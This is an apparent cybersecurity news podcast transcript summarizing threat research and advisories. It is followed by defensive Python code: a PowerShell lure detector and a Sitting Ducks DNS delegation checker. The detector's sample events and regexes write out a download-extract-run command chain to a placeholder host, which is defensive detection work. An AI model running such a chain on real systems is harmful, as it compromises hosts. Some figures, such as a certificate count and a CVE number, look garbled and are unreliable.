Revoked Certs, Microsoft Outage, and Sitting Ducks

Published: Aug 01, 2024 Duration: 00:28:34 Category: Science & Technology

Mass certificate revocation, Azure outage, Android users be aware of some new malware, highest known payout to a ransomware actor, average data breach cost rose, OneDrive phishing campaign, fake Google Authenticator, Sitting Ducks DNS attack, CISA publishes nine ICS advisories and one known exploited vulnerability. All this and more in today's episode of the Cyber Security Digest.

Hello and welcome back to the Cyber Security Digest, where our goal is to help you stay informed so you can stay secure. Today is Friday, August 2nd, 2024. To our first-time listeners, welcome, and to my return listeners, welcome back. As always, I appreciate you taking the time out of your day to check out the show. If these episodes help you stay informed, I would greatly appreciate it if you would please share this show with a colleague or someone you know who likes staying up to date on the latest cyber security news. Just as a quick reminder, our podcast is now released twice a week, on Tuesdays and Fridays. With fewer episodes, as mentioned previously, we've divided the show into three sections to help you digest it better: first we have Notable News, second Prevalent Patches, and lastly our CISA Corner. I would love your feedback on the show, and in today's show notes, as in last week's, there is a survey. If you wouldn't mind filling that out, that lets me know how I'm doing and areas I can improve upon. All right, we have a very jam-packed episode, so let's dive on in. It is time for our first section, Notable News.

If you use DigiCert, you most likely are already aware of this one, but on Monday DigiCert posted an article highlighting that they would need to start revoking certain certificates. The certificates that would be revoked were due to the fact that they lacked proper domain control verification, or DCV. This issue arose because some CNAME-based validations did not include the required underscore prefix in the random value. This affected about 4% of domain validations. According to Jeremy Rowley on Bugzilla, this impacted 83,7 certificates that were held by 687 of their customers. The problem originated from a modernization project in 2019 that removed the automatic addition of the underscore prefix in some validation paths. This oversight was not detected during DigiCert's reviews or regression testing. A recent user experience enhancement project inadvertently corrected the issue by including the underscore prefix in all random values. This whole entire issue stems from that missing underscore prefix, which in some CNAME-based validations is required by CA/B Forum rules to prevent potential domain name collisions. If you don't know, the CA/B Forum, or CA/Browser Forum, is an organization that brings together certificate authorities and browser vendors to develop and promote standards. Although the chance of collision is low, compliance requires revocation of non-compliant certificates within 24 hours. Affected customers were notified that they would need to reissue their certificates to avoid revocation. DigiCert did provide impacted customers with instructions on how to reissue their certificates. DigiCert states that in order to prevent these actions going forward they have already taken several steps, as well as plan on taking more, to prevent this from happening again. For a full list of these preventative measures you can find the DigiCert article in the show notes. On Tuesday, July 30th, DigiCert had published an update stating that they were aware of several customers operating within critical infrastructure that were unable to update their certificates within the 24-hour time frame. DigiCert stated that those critical infrastructure businesses that were unable to replace their certs could request an extension that was due on July 31st. If approved, certificates would have until 19:30 UTC on Saturday, August 3rd, 2024 to be replaced.

All right, on to our next story here. Also occurring on Tuesday, Microsoft Azure and Microsoft 365 customers began to experience outages across numerous Microsoft services. Impacted services included Microsoft Entra, Microsoft Purview, Microsoft 365, as well as several Azure services including Azure Portal, Azure Policy, Azure App Services, among others. According to Microsoft's mitigation statement, they said, and I quote: "An unexpected usage spike resulted in Azure Front Door (AFD) and Azure Content Delivery Network (CDN) components performing below acceptable thresholds, leading to intermittent errors, timeout, and latency spikes. While the initial trigger event was a distributed denial of service (DDoS) attack, which activated our DDoS protection mechanisms, initial investigations suggest that an error in the implementation of our defenses amplified the impact of the attack rather than mitigating it." End quote. Their mitigation statement also highlights how they responded to the outage, stating that once they had identified the cause they began to attempt to change network configurations to help deal with the reported DDoS attack. Microsoft also stated in their statement that they will publish a final post-incident review with comprehensive details within the next two weeks. Once this becomes available, if there's anything worth noting, I'll be sure to fill you all in.

All right, Android users, you want to be aware of this next one. On Wednesday, Zimperium's research published a blog post that delves into a sophisticated Android-targeted SMS stealer campaign that has been tracked by their researchers since February 2022. The campaign, which has identified over 107,000 malware samples, highlights the evolving nature of mobile malware and the deceptive tactics used by attackers to compromise devices. The malware primarily targets one-time passwords, which are crucial for MFA, making them valuable to attackers. The blog post elaborates that the infection process begins with deceptive tactics such as malicious advertisements and Telegram bots, which trick users into downloading and installing the malware. These methods mimic trusted sources, convincing victims to sideload malicious applications onto their devices. Once installed, the malware gains permission to read SMS messages, enabling the theft of sensitive data including OTPs, or one-time passwords. The article details the various techniques used by attackers to establish command and control channels. Initially Firebase was used, but the attackers later shifted to using GitHub repositories to share command and control details and distribute malicious APKs. This evolution demonstrates the attackers' adaptability and the sophistication of their methods. The scale of the campaign is significant, with malware capable of evading detection by many antivirus solutions. The financial motive behind the campaign is evident, as the stolen credentials are used for further fraudulent activities such as creating fake accounts and launching phishing campaigns. The use of cryptocurrency payments further obscures the attackers' identities. Zimperium emphasizes the need for a multi-layered approach toward mobile security, combining advanced detection technologies with user education and awareness. For more information about the threat actors, as well as for the IOCs, please review the full article from Zimperium linked in the show notes.

All right, next up in today's episode we're going to talk about two annual reports that came out since our last episode. These reports highlight the impact and cost ransomware and data breaches have had on businesses over the last year. I will have links to both of these reports attached in the show notes for your convenience. All right, let's go ahead, let's review some of the key takeaways from these reports. First, Zscaler's annual ransomware report dropped like a hot new mixtape from your favorite rapper. In the report, Zscaler lists their observed top trends in targets, top ransomware families, as well as predictions for the upcoming year. Early in the report, Zscaler states that their ThreatLabz research uncovered a record-breaking ransom payment of 75 million US dollars. This payment is now the largest publicly known payment to a ransomware group, and the payment was received by the Dark Angels ransomware group. Some other notable statistics covered by the report are that they observed the manufacturing, healthcare, and technology sectors among the most targeted. Additionally noted in the report was that the United States was the most targeted country, followed by the UK, Germany, Canada, and France. The report also highlighted several of the major vulnerabilities that had enabled some of these attacks to occur over the past year. These included vulnerabilities such as Cisco's ASA software, ConnectWise ScreenConnect, Cisco's Remote Access VPN, as well as flaws that existed within Citrix NetScaler ADC and NetScaler Gateway. As stated a few episodes ago, Cloudflare had observed an attack go from PoC to attempted exploit in under 30 minutes. It is so important that as defenders we stay ahead of these threat actors. The report from Zscaler goes on to highlight some other trends observed over the past year, as well as names the following as the top five ransomware families to watch for in the coming year: number one was Dark Angels, number two LockBit, three BlackCat, four Akira, five Black Basta. Zscaler's report was a great read, and if you would like to check out the full report for yourself, I've linked it for you in the show notes.

The other report that came out was IBM's 2024 Cost of a Data Breach report. This report had some pretty intriguing findings as well. First, the report highlighted the global average cost of a data breach increased by 10% to $4.88 million US. This is the highest jump since the pandemic. It is also worth noting that the report calls out that this average cost rose to $4.9 million when the attack was caused by a malicious insider. The report also highlighted that extensive use of AI tools in automation reduced breach costs by an estimated average of $2.2 million US. Some other statistics that I found interesting when I was reading the report were that IBM reported 46% of breaches involved customer personal data. I was really impressed with the time frame IBM stated it took to contain a breach involving stolen credentials. This is not a good impression, mind you; it was one that was kind of more shocking than anything in the report. IBM states, and I quote: "Breaches involving stolen or compromised credentials took the longest to identify and contain of any attack vector." End quote. The report states that this time frame was 292 days. As we have discussed in past episodes, with info stealers and all the different phishing campaigns that are going on out there, these statistics are concerning. This report goes into a lot more detail; we unfortunately don't have time to dive into everything within this episode. However, as with the Zscaler report, I have linked the IBM report in the show notes if you are interested in reading it. These reports are really great if you are in a position where you need to help convey potential risk to your leadership. I highly suggest that you review both of these reports to educate yourself as well as use them to your advantage.

Earlier in the week, Trellix's Advanced Research Center published a blog post discussing a recently identified sophisticated phishing campaign that was targeting Microsoft OneDrive users. Trellix researchers state that this campaign employs social engineering tactics to deceive users into executing a PowerShell script which compromises their system. The attack begins with an email containing an HTML file that, when opened, displays an image simulating a Microsoft OneDrive error message. This message urges users to fix a DNS issue by clicking a button, which ultimately leads them to execute malicious commands. The phishing email's HTML file includes an image designed to create a sense of urgency, increasing the likelihood that the user will follow through with the provided instructions. The image mimics a OneDrive page with an error message and two buttons; those buttons are "Details" and "How to fix". While the Details button directs users to a legitimate Microsoft Learn page, the How to fix button triggers a malicious script. This script instructs users to open the Windows PowerShell terminal and execute a command that downloads and runs a malicious payload. The malicious command first flushes the DNS cache, then creates a folder on the C drive named Downloads. It downloads an archive file into this location, extracts its contents, and executes a script using AutoIt3.exe. The attack concludes with a message indicating that the operation was successful, further deceiving the user. The full blog post from Trellix goes into greater technical detail, as well as contains visual examples of the malware, as well as has a list of IOCs. As with all of our other articles that we talk about on the show, there is a link in the show notes.

Also earlier in this week, on Tuesday, Malwarebytes Labs published an article that they identified a threat actor who had impersonated Google through a fake ad for Google Authenticator. This malicious ad appeared in Google search results, tricking users into downloading malware instead of the legitimate multifactor authentication program. The core issue lies in the misuse of brand trust, as the ad seemed to be from an official source, leading users to a decoy website that hosted malware. The fraudulent website, chromeweb-authenticators.com, was registered on the same day the ad was observed by Malwarebytes Labs. The site's source code revealed that it downloaded a malicious file, Authenticator.exe, from GitHub. The threat actor used GitHub to host the malware to evade conventional security measures. The malware, identified as DeerStealer, exfiltrates personal data to an attacker-controlled website. The article emphasizes the importance of distinguishing real advertisers from fake ones to prevent such attacks. It highlights the irony of users getting compromised while trying to enhance their security by downloading a trusted tool like Google Authenticator. The misuse of Google Ads for distributing malware erodes trust in brands and the Google search platform itself. To mitigate such risks, the article recommends avoiding clicking on ads to download software and instead visiting the official website and repositories to download directly. If you use Malwarebytes, guess what, they've already updated and are blocking this specific malware. If you do not have Malwarebytes, they also have IOCs, as well as a hash for the payload and an address for the command and control server, that you can find in the full report from Malwarebytes.

All right, let's move on here from Malwarebytes to our next piece of research, which is from Cleafy. On Wednesday, threat researchers at Cleafy reported on the emergence of a new Android remote access trojan named BingoMod. This was identified in May 2024. The report states that this malware is part of the modern remote access trojan generation, enabling threat actors to conduct account takeover directly from infected devices using on-device fraud techniques. BingoMod's core component, initially known as ChrUpdate, allows for remote access and control similar to other banking trojans like Medusa, Copybara, and TeaBot. The malware's primary advantage is its ability to bypass various behavioral detection countermeasures, although it requires a live operator to authorize money transfers, limiting its scalability. BingoMod employs several sophisticated techniques to evade detection and hinder forensic analysis. It uses device wiping after successful fraudulent transfers, a tactic reminiscent of the BRATA malware. The self-destruction mechanism eradicates any trace of the malware's activity, making it challenging for researchers to identify and attribute incidents. Cleafy researchers noted the malware also leverages obfuscation techniques to reduce its detection rate by antivirus solutions, indicating the developers' focus on opportunistic rather than tailored approaches. The malware is distributed via smishing and often masquerades as legitimate antivirus applications. Once installed, it prompts users to activate Accessibility Services, disguising the request as necessary for the app's functionality. Upon granting permissions, the malware unpacks itself and sets up a command and control communication channel. BingoMod provides around 40 remote control functions, including real-time screen control, phishing capabilities through overlay attacks, and the ability to send SMS messages from the compromised device. BingoMod's security measures include hindering system settings editing, blocking specified applications, and uninstalling arbitrary apps to prevent detection. Its most notable feature is the ability to remotely wipe the device, typically executed after a successful attack. Like mentioned earlier, the malware's reliance on manual intervention for account takeover activities limits its scalability and exposes operators to higher detection risks. For the full article, as well as IOCs, please check for the full report from Cleafy in the show notes.

On Wednesday, the threat intel teams at Eclypsium and Infoblox reported on a significant vulnerability in the domain name system infrastructure termed Sitting Ducks. This vulnerability has been exploited by multiple threat actors since at least 2019, leading to malware delivery, phishing, brand impersonation, and data exfiltration. The reports from these companies highlight that the core issue lies in the weak or non-existent verification of domain ownership by DNS providers, which allows attackers to hijack domains. The Sitting Ducks attack occurs under specific conditions. Eclypsium states these conditions in their article, and they are as follows, and I quote: "A registered domain or subdomain of a registered domain uses the authoritative DNS services of a different provider than the domain registrar. This is called name server delegation. A domain is registered with one authoritative DNS provider, and either the domain or a subdomain is configured to use a different DNS provider for authoritative name service. The name service delegation is lame, meaning that the authoritative name server does not have information about the domain and therefore cannot resolve queries or subdomains. The DNS provider is exploitable, meaning that the attacker can claim ownership of the domain at the delegated authoritative DNS provider while not having access to the valid owner's account at the domain registrar." End quote. Attackers can claim ownership of the domain at the delegated authoritative DNS provider without accessing the valid owner's account at the domain registrar. This scenario is more common than it might seem, and active exploitation has been confirmed. The article explains that Sitting Ducks is a new issue but falls into a broader category of DNS-related vulnerabilities. Lame delegation occurs when a name server is assigned to provide authoritative DNS records but lacks the necessary information. Attackers can exploit this by registering the assigned name server domain, gaining access to all domains pointing to it. Additionally, dangling DNS records, which contain invalid information due to forgotten configurations, can be exploited by malicious actors who register lapsed domains. To mitigate the risk of Sitting Ducks attacks, the article recommends several steps for domain owners and DNS service providers. Domain owners should ensure that they use the same provider for both domain registration and authoritative DNS services, check for invalid name server delegations, and inquire about their DNS provider's mitigation measures. DNS service providers should implement verification processes to ensure that account holders claiming domain names actually control them, such as issuing random name server hosts that require changes at the registrar. Researchers from Infoblox and Eclypsium have been working with law enforcement and national CERTs since June 2024 to address this issue. If you'd like to read more about this fantastic research, please find the links to both articles in the show notes.

On Thursday, Proofpoint published a blog discussing a cluster of cyber criminal activities which have been leveraging Cloudflare Tunnels to deliver malware. This activity, first observed in February 2024, has increased significantly from May through July. The attackers exploit the TryCloudflare feature to create one-time tunnels without needing an account, allowing them to remotely access data and resources. Proofpoint notes that the campaigns primarily lead to the installation of Xworm, a remote access trojan, but have also delivered other malware like AsyncRAT, VenomRAT, GuLoader, and Remcos. The article describes the attack chain: it typically begins with messages containing a URL or attachment leading to an internet shortcut file, or URL file. When executed, this file connects to an external file share to download an LNK or VBS file, which then executes a BAT or CMD file to download a Python installer package. This package ultimately leads to the malware being installed. The campaigns often use business-relevant themes like invoices and document requests to lure victims. The threat actors have evolved their tactics over time, incorporating obfuscation in their scripts to evade detection. Proofpoint notes that the attackers' use of temporary Cloudflare instances provides flexibility and makes it harder for defenders to block their activities. Also, as noted in the blog posting, this requires significant victim interaction, so please ensure that your users are aware of this attack vector so they know not to execute these files. They should also know not to execute unknown files, and this would be a really good way for you to remind them with something relevant. If you would like to read more about this attack, as well as a list of signatures and IOCs from Proofpoint, the full article can be found in the attached show notes.

Lastly, rounding out our Notable News section for this episode: if you live in the southeastern United States, be advised that your capability to get blood in the event of a medical emergency may be slightly more difficult right now. On Wednesday, OneBlood, a not-for-profit blood center, posted that it had been impacted by a ransomware attack. Susan Forbes, OneBlood senior vice president of corporate communications and public relations, stated, and I quote: "OneBlood takes the security of our network extremely seriously. Our team reacted quickly to assess our systems and began an investigation to confirm the full nature and scope of the event. Our comprehensive response efforts are ongoing and we are working diligently to restore full functionality to our systems as expeditiously as possible." End quote. In the advisory from OneBlood, they also suggested that if you live in that area and are able to donate, it would help make a difference, due to the impact that this has had on blood in that area. If you'd like to read the official statement from OneBlood, I have linked it in the show notes.

All right, it is time to move on to our next section of the show, Prevalent Patches. All right, first up in Prevalent Patches: Ubuntu has had several patches come out this week resolving vulnerabilities across several of their products. Also, we had some advisories from Red Hat Linux as well since our last show; in fact there's been about 50 advisories for their products, including Red Hat Enterprise Linux as well as OpenShift. All right, that does it for Prevalent Patches here today. On to our last segment of the show, and that is our CISA Corner.

All right, welcome to our final segment of the show, our CISA Corner. First up in our CISA Corner here today is the sole addition to the Known Exploited Vulnerabilities catalog. This is for the VMware ESXi vulnerability that we discussed in our last episode. This vulnerability is tracked as CVE-2024-37805. If you would like to hear more about this vulnerability, I suggest you listen to the last episode, where I discussed the vulnerability that was discovered by Microsoft more in depth. Additionally, you can find more details surrounding the CVE in the show notes. Also since our last episode, CISA published nine new Industrial Control Systems advisories. Five of these advisories are for Johnson Controls exacqVision, one is for AVTECH IP Camera, one for Vonets Wi-Fi bridges, and one is for Rockwell Automation Logix controllers. If you'd like to read the full details about these ICS advisories, I have linked the CISA document in the show notes. Lastly, on Thursday, CISA announced that they had selected Lisa Einstein as CISA's first Chief Artificial Intelligence Officer. CISA stated that this selection reflects our commitment to responsibly use AI to advance cyber defense. The full press release can be found in the show notes as well if you'd like to read more about that.

All right everyone, thank you so much for tuning in to today's episode of the Cyber Security Digest. As mentioned earlier, all links and articles mentioned in the show are in the show notes. Additionally, you can head to our website, thecybersecuritydigest.com, to find our show notes as well as all of our previous episodes. On the website you'll also find links to listen to this on your podcast platform of choice. If you like this episode, please consider sharing with someone you know who would like the show as well or benefit from the information I have provided. Lastly, I would greatly appreciate it if you could leave this show a rating in your podcast platform of choice. As mentioned in the beginning of the show, in the show notes you'll also find a link to a form where I'm requesting your feedback; if you wouldn't mind filling that out, that will help me continue to improve this show. All right, before you head out for your weekend, here's your Friday dad joke: what do you call a lying dictionary? A fictionary. All right everyone, thank you so much for tuning in, and until next time, stay informed to stay secure.
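For the OneDrive lure Trellix describes, each step of the pasted PowerShell command (DNS flush, new folder on the C drive, archive download, extraction, AutoIt3.exe launch) is ordinary on its own; correlating them per host inside a short window is what yields a detection. This is an added example, not code from the podcast or from Trellix: it runs that correlation over constructed script-block log events, and the field names ts/host/user/script, the window size and the regexes are assumptions to adapt to your own logging.

```python
"""Correlate PowerShell script-block log events for the copy-and-paste chain
from the Trellix OneDrive lure: flush the DNS cache, create a folder under the
system drive, download an archive into it, extract it and launch AutoIt3.exe.
Each step alone is routine; the combination on one host within a short window
is the signal. Added example; field names and all events are constructed."""
import re
from collections import defaultdict
from typing import Dict, List

# Indicator name -> regex over the script text (assumed to be the script-block
# text of a PowerShell logging event). Patterns are deliberately broad.
INDICATORS = {
    "flush_dns": re.compile(r"ipconfig\s*/flushdns|Clear-DnsClientCache", re.I),
    "mkdir_root": re.compile(r"\b(mkdir|md|New-Item)\b[^\n]*[A-Za-z]:\\\w+", re.I),
    "download": re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|DownloadFile|Start-BitsTransfer", re.I),
    "extract": re.compile(r"Expand-Archive|ExtractToDirectory|\btar\b\s+-x", re.I),
    "autoit": re.compile(r"AutoIt3(_x64)?\.exe", re.I),
}
CORE = {"download", "extract", "autoit"}   # all three needed to raise an alert
WINDOW_SECONDS = 600                         # a user typing the lure takes minutes


def match_indicators(script: str) -> set:
    """Names of every indicator present in one script-block text."""
    return {name for name, rx in INDICATORS.items() if rx.search(script)}


def correlate(events: List[Dict]) -> List[Dict]:
    """Group events per host+user, slide a time window over them and emit one
    alert per actor at the first window that contains every CORE indicator."""
    by_actor = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_actor[(e["host"], e["user"])].append(e)
    alerts = []
    for (host, user), evs in by_actor.items():
        start = 0
        for end, e in enumerate(evs):
            while e["ts"] - evs[start]["ts"] > WINDOW_SECONDS:
                start += 1          # drop events older than the window
            seen = set()
            for w in evs[start:end + 1]:
                seen |= match_indicators(w["script"])
            if CORE <= seen:
                alerts.append({"host": host, "user": user,
                               "first_ts": evs[start]["ts"], "last_ts": e["ts"],
                               "indicators": sorted(seen), "score": len(seen)})
                break               # one alert per actor is enough for triage
    return alerts


# Constructed script-block events (ts in seconds). WS01 mirrors the five steps
# of the lure; WS02 is benign admin activity spread over hours, so no alert.
EVENTS = [
    {"ts": 100, "host": "WS01", "user": "alice", "script": "ipconfig /flushdns"},
    {"ts": 104, "host": "WS01", "user": "alice", "script": "mkdir C:\\Downloads"},
    {"ts": 110, "host": "WS01", "user": "alice",
     "script": "Invoke-WebRequest http://placeholder.invalid/p.zip -OutFile C:\\Downloads\\p.zip"},
    {"ts": 116, "host": "WS01", "user": "alice",
     "script": "Expand-Archive C:\\Downloads\\p.zip -DestinationPath C:\\Downloads"},
    {"ts": 121, "host": "WS01", "user": "alice",
     "script": "& C:\\Downloads\\AutoIt3.exe C:\\Downloads\\p.a3x"},
    {"ts": 5000, "host": "WS02", "user": "bob", "script": "ipconfig /flushdns"},
    {"ts": 9000, "host": "WS02", "user": "bob",
     "script": "Invoke-WebRequest https://placeholder.invalid/build.zip -OutFile build.zip"},
    {"ts": 9010, "host": "WS02", "user": "bob",
     "script": "Expand-Archive build.zip -DestinationPath .\\build"},
]


def run_sample() -> List[Dict]:
    """Alerts produced by the constructed events above."""
    return correlate(EVENTS)


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a['host']}/{a['user']} ts {a['first_ts']}-{a['last_ts']} "
              f"score {a['score']}: {', '.join(a['indicators'])}")
```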
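The Sitting Ducks conditions quoted from Eclypsium above can be turned into an inventory check for your own domains. The following is an added example, not code from the podcast or from Eclypsium or Infoblox: the provider names, sample domains, fake SOA probe and the "claimable provider" set are all constructed, and a real run would replace the probe with direct SOA queries to each delegated name server and the claimable set with your own review of each provider's ownership verification.

```python
"""Triage DNS delegations against the three Sitting Ducks conditions quoted
from Eclypsium: (1) authoritative DNS sits with a provider other than the
registrar, (2) the delegation is lame, (3) that provider lets anyone claim the
zone. Condition 3 cannot be probed safely, so it comes from provider metadata.
Added example; registrars, providers, domains and answers are all constructed."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Set

# What a delegated name server answered when asked directly (RD=0) for the
# zone's SOA. A real probe would inspect the AA bit and RCODE; constructed here.
AUTHORITATIVE = "authoritative"   # AA=1 with SOA: healthy delegation
REFUSED = "refused"               # server has no zone configured for the name
SERVFAIL = "servfail"             # server cannot serve it, or NS host unresolvable
LAME_STATES = {REFUSED, SERVFAIL}

@dataclass
class Delegation:
    domain: str
    registrar: str          # provider holding the registration
    ns_hosts: List[str]     # NS records published in the parent zone

def provider_for(ns_host: str, provider_map: Dict[str, str]) -> str:
    # Map an NS hostname to the provider operating it via a suffix table.
    for suffix, provider in provider_map.items():
        if ns_host.endswith(suffix):
            return provider
    return "unknown"

def assess(d: Delegation, soa_probe: Callable[[str, str], str],
           provider_map: Dict[str, str], claimable: Set[str]) -> dict:
    """Apply the three conditions to one delegation and grade the result."""
    providers = {provider_for(ns, provider_map) for ns in d.ns_hosts}
    delegated = ", ".join(sorted(providers))
    reasons = []
    # Condition 1: name server delegation to a provider other than the registrar.
    elsewhere = any(p != d.registrar for p in providers)
    if elsewhere:
        reasons.append(f"authoritative DNS at {delegated}, registrar is {d.registrar}")
    # Condition 2: lame delegation. Lame only if no delegated NS answers
    # authoritatively; a single healthy NS still serves the zone.
    states = {ns: soa_probe(d.domain, ns) for ns in d.ns_hosts}
    lame = all(s in LAME_STATES for s in states.values())
    if lame:
        reasons.append(f"no delegated name server is authoritative: {states}")
    # Condition 3: from inventory, since claimability must not be tested live.
    can_claim = any(p in claimable for p in providers)
    if can_claim:
        reasons.append(f"{delegated} does not verify ownership against the registrar")
    if elsewhere and lame and can_claim:
        severity = "critical"   # every Sitting Ducks condition is met
    elif lame:
        severity = "high"       # lame delegation is a defect on its own
    elif elsewhere:
        severity = "info"       # common and fine when the provider verifies
    else:
        severity = "ok"
    return {"domain": d.domain, "provider": delegated, "lame": lame,
            "claimable": can_claim, "severity": severity, "reasons": reasons}

# --- Constructed sample inventory (not real providers, domains or answers) ---
PROVIDER_MAP = {".ns.registrar-a.example": "RegistrarA",
                ".dns.host-b.example": "HostB",
                ".dns.host-c.example": "HostC"}
CLAIMABLE = {"HostB"}   # hypothetical provider that accepts unclaimed zones
FAKE_ANSWERS = {
    ("shop.example", "ns1.dns.host-b.example"): REFUSED,
    ("shop.example", "ns2.dns.host-b.example"): REFUSED,
    ("corp.example", "ns1.dns.host-c.example"): AUTHORITATIVE,
    ("corp.example", "ns2.dns.host-c.example"): SERVFAIL,
    ("intra.example", "ns1.ns.registrar-a.example"): AUTHORITATIVE,
}
SAMPLES = [
    Delegation("shop.example", "RegistrarA",
               ["ns1.dns.host-b.example", "ns2.dns.host-b.example"]),
    Delegation("corp.example", "RegistrarA",
               ["ns1.dns.host-c.example", "ns2.dns.host-c.example"]),
    Delegation("intra.example", "RegistrarA", ["ns1.ns.registrar-a.example"]),
]

def fake_soa_probe(zone: str, ns_host: str) -> str:
    """Stand-in for a live SOA query; unknown pairs behave like SERVFAIL."""
    return FAKE_ANSWERS.get((zone, ns_host), SERVFAIL)

def run_samples() -> Dict[str, str]:
    """Severity per sample domain, used by the demo below and by tests."""
    return {d.domain: assess(d, fake_soa_probe, PROVIDER_MAP, CLAIMABLE)["severity"]
            for d in SAMPLES}

if __name__ == "__main__":
    for d in SAMPLES:
        f = assess(d, fake_soa_probe, PROVIDER_MAP, CLAIMABLE)
        print(f"{f['domain']}: {f['severity']}")
        for r in f["reasons"]:
            print("  -", r)
```

Only shop.example meets all three conditions; corp.example is delegated elsewhere but one of its name servers still answers, so it is merely noted, and the mitigation the article recommends (same provider for registration and authoritative DNS) is exactly what turns a "critical" row into "ok".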
